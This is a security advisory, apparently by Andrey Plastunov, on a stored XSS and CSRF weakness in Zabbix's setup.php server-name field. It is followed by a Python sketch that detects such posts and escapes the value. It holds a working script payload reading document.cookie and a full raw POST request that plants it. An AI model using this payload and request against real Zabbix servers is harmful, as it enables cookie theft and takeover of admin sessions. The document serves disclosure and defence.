
      There is a stored XSS vulnerability in the Server name parameter.

      This parameter is specified during the initial setup, but since /zabbix/setup.php is still available after the setup and there is no protection against CSRF attacks, a malicious attacker could convince an Admin to execute the script via a CSRF attack.

      The vulnerable parameter is zbx_server_name
      Example vector: </title><script>alert(document.cookie)</script>

      An example request for setting up the Server name:
      POST /zabbix/setup.php HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://127.0.0.1/zabbix/setup.php
      Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
      DNT: 1
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 184

      sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step
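
A defensive sketch of the two gaps described above, added here as an example and not taken from the Zabbix code base: it flags setup.php posts whose zbx_server_name decodes to HTML markup or whose Origin/Referer does not match Host, and shows the value HTML-escaped before output. It assumes the name is rendered inside `<title>`, as the `</title>` prefix of the example vector suggests; the function names, finding labels and sample requests are constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

MARKUP_CHARS = set("<>\"'&")  # characters that must never reach HTML unescaped

def build_post(referer: str, server_name_encoded: str) -> str:
    """Constructed sample request, trimmed from the one in the report."""
    body = ("form_refresh=1&zbx_server=localhost&zbx_server_port=10051"
            "&zbx_server_name=" + server_name_encoded)
    return ("POST /zabbix/setup.php HTTP/1.1\n"
            "Host: 127.0.0.1\n"
            f"Referer: {referer}\n"
            "Content-Type: application/x-www-form-urlencoded\n\n" + body)

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (path, headers, form fields)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    path = urlsplit(lines[0].split()[1]).path
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = parse_qs(body.strip(), keep_blank_values=True)
    return path, headers, {k: v[0] for k, v in fields.items()}

def review_setup_post(raw: str) -> list:
    """Return findings for one logged POST; empty list means nothing to review."""
    path, headers, form = parse_request(raw)
    if not path.endswith("/setup.php"):
        return []
    findings = []
    # parse_qs has already URL-decoded the value, so %3C shows up as '<'.
    if MARKUP_CHARS & set(form.get("zbx_server_name", "")):
        findings.append("markup-in-server-name")
    # No anti-CSRF token is checked, so the source header is the only signal.
    source = headers.get("origin") or headers.get("referer", "")
    if urlsplit(source).netloc != headers.get("host", ""):
        findings.append("origin-not-verified")
    return findings

def render_title(server_name: str) -> str:
    """Output-encode the stored name at the point it enters the page."""
    return "<title>" + html.escape(server_name, quote=True) + "</title>"

SAMPLE_FROM_REPORT = build_post(
    "http://127.0.0.1/zabbix/setup.php",
    "%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E")
SAMPLE_CROSS_SITE = build_post("http://other.example/page.html", "Prod+monitoring")
```

Escaping on output is the fix for the stored XSS; the origin check only detects the CSRF path and does not replace a per-session token or removing access to setup.php after installation.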

            osakaaa Andrey Plastunov